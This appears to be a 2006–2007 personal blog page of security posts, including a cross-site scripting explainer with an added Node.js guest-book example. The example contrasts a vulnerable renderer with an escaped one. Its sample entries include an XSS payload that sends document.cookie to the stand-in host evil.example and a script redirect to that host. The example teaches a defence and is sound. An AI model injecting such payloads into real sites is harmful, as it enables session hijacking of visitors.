security

Cross Site Scripting Response
Submitted by aaron on Wed, 04/11/2007 - 1:06pm.
I listen regularly to Security Now, and there has been a lot of talk lately about cross-site scripting vulnerabilities on blogs and websites.
For a more detailed write-up of what cross-site scripting is than I could ever produce, check out trusty Wikipedia.
Aaron's really basic overview
Here is a really basic overview. In HTML documents (such as this one) you can put client-side code (generally JavaScript, but it can be many flavors) anywhere on the page.
You can completely mix content and code however you want.
Years ago, when the web was young and pretty much a one-to-many broadcast medium (I post content, you look at content, nothing more), this was not a problem. The only way you could make my server spit out content was to get my FTP credentials.
The problem comes when you accept content from users, which has been all the rage with the young kids ever since... 1995? ; )
So, say I have a guest book on my site. If that content is not properly checked, you could include a line of code that would kick every user who hits that page over to a porn site... or cover it in platypuses. Worse still, you could include a line of JavaScript that sends you a copy of each visitor's session cookie, which would let you pose as them on the website.
Not a big deal for your average blog, but amazon.com? Banking? You get the idea.
Solution: uh.. browser manufacturers?.. W3C? Turn that stupid crap off!
With current HTML standards and practices there is absolutely zero need for tag attributes that execute code, such as 'onclick', 'onmouseover', etc. There is also absolutely zero reason a <script> tag should ever be found mixed in with content. Most usage of both at this point is due to either backward compatibility with really old browsers, or sheer laziness.
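As an added example (not code from the original post), here is the guest-book scenario above in Node.js: a renderer that pastes user entries straight into the page, the same renderer with HTML escaping applied on output, and a crude check that counts live <script> elements and on* handler attributes in the result. The entries, the host name evil.example and every function name are constructed for this illustration. The point it adds to the post is that escaping on the server side neutralises both payloads (the <script> injection and the attribute-breakout onmouseover) without waiting for browsers to change what they accept.

```javascript
// Added example: a toy guest book renderer, vulnerable and fixed.
// Not code from the original post; all entries below are constructed.

// Constructed guest-book entries: one benign, two hostile.
const ENTRIES = [
  { name: "alice", message: "Nice site!" },
  // Redirect every visitor elsewhere (the "kick all users to a porn site" case).
  { name: "mallory", message: '<script>location.href="http://evil.example/"</script>' },
  // Break out of a quoted attribute and add an event handler that leaks
  // document.cookie. No <script> tag is needed for this one.
  { name: 'mallory" onmouseover="new Image().src=\'http://evil.example/c?\'+document.cookie', message: "hi" },
];

// The vulnerable renderer: user text is pasted straight into the HTML,
// both into an attribute value and into element content.
function renderUnsafe(entries) {
  return entries
    .map(e => `<li><b class="author" title="${e.name}">${e.name}</b>: ${e.message}</li>`)
    .join("\n");
}

// Escape the five characters that can change meaning in HTML text or in a
// quoted attribute value. The template must still quote its attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// The fixed renderer: same template, every user-supplied value escaped on output.
function renderSafe(entries) {
  return entries
    .map(e => `<li><b class="author" title="${escapeHtml(e.name)}">${escapeHtml(e.name)}</b>: ${escapeHtml(e.message)}</li>`)
    .join("\n");
}

// Crude structural check used only to show the difference between the two
// renderers: how many <script> start tags are there, and which on* handler
// attributes does a quote-aware attribute scan find inside start tags?
function executableContent(html) {
  const tags = html.match(/<[a-zA-Z][^>]*>/g) || [];
  const handlers = [];
  let scripts = 0;
  for (const tag of tags) {
    if (/^<script\b/i.test(tag)) scripts++;
    // Attribute = name, "=", double-quoted value. In the escaped output the
    // hostile text stays inside one quoted value, so no on* name appears.
    for (const m of tag.matchAll(/\s(\w+)\s*=\s*"[^"]*"/g)) {
      if (/^on/i.test(m[1])) handlers.push(m[1]);
    }
  }
  return { scripts, handlers };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("--- unsafe ---\n" + renderUnsafe(ENTRIES));
  console.log(executableContent(renderUnsafe(ENTRIES)));
  console.log("--- safe ---\n" + renderSafe(ENTRIES));
  console.log(executableContent(renderSafe(ENTRIES)));
}
```

Run it with `node guestbook.js`. The unsafe output reports one script element and an `onmouseover` handler; the escaped output reports none of either, because `<script>` has become `&lt;script&gt;` text and the stray `"` in the hostile name has become `&quot;`, so the browser never sees a second attribute.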

User Verification Gone Horribly Wrong
Submitted by aaron on Wed, 11/08/2006 - 11:57am.
We've got a client, named 'growingtales.com'. They do a modest amount of business on the web, and they need an SSL certificate in order to do it. Their SSL cert expired in October. In September I received a reminder email about renewal, and I called up their web host to renew their certificate.
I keep our clients' account information in an encrypted password manager called KeePass Password Safe. So when I called up the sales people to renew the domain, I opened up the password manager and read off my 'secret word', which they use to verify me.
The nice sales person (the real humans are in sales, tech support gets their flunkies) accepted the renewal, and I told him to bill it to the card on file.

Bruce Schneier knows Alice and Bob's shared secret.
Submitted by aaron on Mon, 10/23/2006 - 2:12pm.
Bruce Schneier is the man. He's a really good, solid voice on current security. I'm 3/4 through his most recent book and there is not a moment reading it when I don't say, holy shit! That is so stupidly logical!
He's rather even-handed when it comes to security decisions; he calls the current administration on what they've done right and what they've done wrong. (Although there are cases when the wrong greatly outnumbers the right.)
At any rate, here's a good example from his blog (of which I have become a daily reader):